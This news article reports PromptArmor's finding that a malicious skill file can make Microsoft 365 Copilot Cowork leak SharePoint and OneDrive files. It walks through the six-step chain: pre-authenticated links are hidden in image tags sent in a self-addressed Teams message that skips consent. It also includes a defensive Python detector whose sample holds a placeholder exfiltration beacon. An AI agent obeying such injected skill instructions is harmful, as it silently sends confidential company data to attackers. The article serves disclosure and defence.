Microsoft Copilot Cowork exposes major vulnerability: AI Agent susceptible to prompt injection attacks leaking corporate confidential files
Cybersecurity organization PromptArmor reveals that Microsoft 365 Copilot Cowork has a prompt injection vulnerability, allowing attackers to use a malicious skill file to cause corporate SharePoint and OneDrive confidential files to leak.
Five tests, five successes. Last week, cybersecurity research firm PromptArmor released a threat intelligence report showing that the Copilot Cowork feature of Microsoft 365 has a fully reproducible file-leakage attack chain.
An attacker only needs to embed five malicious instructions into an 81-line skill configuration file to make the AI agent quietly send enterprise confidential files from SharePoint and OneDrive to a server the attacker controls, without the user noticing.
This is not an isolated model issue. Both Claude Opus 4.7 and Claude Sonnet 4.6 were verified as affected, and Opus 4.7 behaved more “aggressively”: on its own initiative it widened the search scope to include every file opened during the victim’s Cowork sessions that week.
Microsoft says it will ask you, but it doesn’t
The key to this attack lies in the gap between the official documentation and the actual behavior.
Microsoft’s official documentation clearly states: “Cowork will seek your consent before performing sensitive operations, such as sending emails or posting messages in Teams.”
However, PromptArmor’s researchers found that this rule fails outright when the recipient is the user themselves. Sending an email to oneself or a Teams message to oneself is executed by Copilot Cowork automatically, with no authorization prompt, and there is no setting that lets users change this behavior.
This detail becomes the critical loophole in the entire attack chain.
Copilot Cowork is a Frontier feature of Microsoft 365 that accesses the user’s full cloud permissions via Microsoft Graph, so it can read and manipulate data across the entire enterprise tenant. In other words, it can see everything you can see, including financial reports on SharePoint, HR data in OneDrive, and every file containing personally identifiable information.
Attack steps
The attack chain consists of six steps:
Step 1: The victim’s SharePoint or OneDrive contains sensitive files with personal or financial data.
Step 2: The victim downloads a skill configuration file from the internet and uploads it to Copilot Cowork, a routine operation comparable to installing a plugin. The skill file is loaded automatically from a specific path in the user’s OneDrive, where administrators have very limited visibility.
Step 3: The victim asks Copilot Cowork to generate a weekly work summary, triggering the skill execution.
Step 4: The injected instructions manipulate the agent into obtaining a “pre-authenticated download link” for each file, then embedding those links as query parameters in malicious HTML image tags whose source points at the attacker’s server.
What is a pre-authenticated download link? Simply put, it is a URL that carries its own authorization. Anyone holding the link can download the file directly without signing in to a Microsoft account.
Step 5: The agent sends a Teams message to the user themselves containing these malicious image tags. No user authorization is required, and the malicious content is invisible to the user: even when they open the message, nothing looks abnormal.
Step 6: When the user opens the Teams message, the client automatically loads the images, which transmits the pre-authenticated download links to the attacker’s server. The attacker can then use those links to download every file at any time.
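As an added, defender-side example that is not part of PromptArmor’s report or this article: a small Python scanner that flags image references in a Teams message body or a text-based skill file which point at an untrusted host and carry a SharePoint/OneDrive link in their query string or path, the exfiltration shape described in steps 4 to 6. The image-host allowlist, the storage-domain list and the sample message are constructed assumptions, not values from the report.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Assumption: hosts from which legitimate Teams/Copilot content loads images.
TRUSTED_IMAGE_HOSTS = {"teams.microsoft.com", "statics.teams.cdn.office.net"}
# Assumption: domains a pre-authenticated download link would point to.
STORAGE_DOMAINS = ("sharepoint.com", "onedrive.com", "1drv.ms")

# HTML <img src="..."> and Markdown ![alt](url) forms (a skill file may be Markdown).
IMG_SRC_RE = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
MD_IMG_RE = re.compile(r'!\[[^\]]*\]\(([^)\s]+)')


def _mentions_storage(value: str) -> bool:
    # Decode twice so a double-URL-encoded link is still recognised.
    v = unquote(unquote(value)).lower()
    return any(d in v for d in STORAGE_DOMAINS)


def find_exfil_images(content: str) -> list[dict]:
    """Return image references that fetch from an untrusted host and smuggle a storage link."""
    findings = []
    for src in IMG_SRC_RE.findall(content) + MD_IMG_RE.findall(content):
        parsed = urlparse(src)
        host = (parsed.hostname or "").lower()
        if not host or host in TRUSTED_IMAGE_HOSTS:
            continue  # relative or allow-listed image: not an outbound beacon
        carriers = []
        for key, vals in parse_qs(parsed.query, keep_blank_values=True).items():
            if any(_mentions_storage(v) for v in vals):
                carriers.append(key)
        if _mentions_storage(parsed.path):
            carriers.append("<path>")  # link smuggled in the path instead of the query
        if carriers:
            findings.append({"src": src, "host": host, "carriers": carriers})
    return findings


# Constructed sample: a benign CDN image plus one beacon carrying an encoded SharePoint link.
SAMPLE_MESSAGE = (
    "<p>Weekly summary attached.</p>"
    '<img src="https://statics.teams.cdn.office.net/ok.png">'
    '<img src="https://collector.example.invalid/p.gif?f='
    "https%3A%2F%2Fcontoso.sharepoint.com%2Fsites%2Ffinance%2FQ3.xlsx%3Ftoken%3DREDACTED\">"
)

if __name__ == "__main__":
    for hit in find_exfil_images(SAMPLE_MESSAGE):
        print(f"suspicious image fetch to {hit['host']} carrying a storage link in {hit['carriers']}")
```

Run it over exported message bodies or the contents of the skill-file path before a skill is enabled; a hit is a reason to block the host at the proxy and to revoke the embedded link.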
The smarter the model, the more comprehensive the leak
PromptArmor’s testing reveals a thought-provoking phenomenon: the more capable the model, the greater the damage in this attack scenario.
Initially, the tests ran in “automatic” mode, which switches dynamically between Claude Opus 4.7 and Claude Sonnet 4.6. The researchers later tested Opus 4.7 on its own and found that the same injected instructions succeeded in full.
The attack chain succeeded in every test and does not depend on the exact wording of the user’s query; any query that triggers loading of the skill is enough for the injection to succeed.
The persistence of the attack is also concerning. Copilot Cowork supports scheduled tasks, allowing users to set prompts to run automatically at regular intervals. Once the attacker’s injection is scheduled, the victim doesn’t need to take any action; the attack silently repeats each cycle, continuously exfiltrating enterprise secrets.
PromptArmor emphasizes that this is not a bug fixable by a single patch but a systemic risk inherent in the enterprise AI agent architecture. When an agent is granted delegated permissions across multiple systems, trust boundary failures in any one system can become an entry point for full compromise.
Restricting permissions is currently the only moat
PromptArmor also disclosed a separate vulnerability that allows data to leak from the Copilot Cowork sandbox environment, independent of this research. This issue is currently under responsible disclosure.
The reason for proactively revealing this attack chain instead of waiting for a fix is that the risk stems from system architecture design, not a specific patchable vulnerability. Users need to be informed and decide whether to accept this risk.
The current mitigation focuses on limiting the agent’s operational scope. Administrators can block file downloads for a SharePoint site with `Set-SPOSite -Identity <site URL> -BlockDownloadPolicy $true` (the site URL is a placeholder to be filled in), or block downloads based on sensitivity labels.
The cost is lost functionality: users can only view files in the browser and cannot download, print, or sync them, and this applies across the Microsoft 365 apps such as Word, Excel, and PowerPoint.
This is also the second major security issue recently affecting the Microsoft Copilot ecosystem. Earlier, EchoLeak (CVE-2025-32711) was a prompt injection vulnerability in the Copilot personal edition. Varonis’ research on the Reprompt attack (CVE-2026-24307) revealed similar click-based data leaks. The indirect prompt injection vulnerability in Copilot Studio (CVE-2026-21520, CVSS 7.5) has been patched, but similar issues remain unaddressed across the broader Copilot product line.
The boundary of AI agent capabilities is becoming a new battleground for enterprise cybersecurity.
When a tool can “do things” on your behalf, its required access permissions inevitably expand, and every granted permission becomes a potential attack vector. Limiting an agent’s actions essentially limits its utility, and this paradox currently has no perfect solution.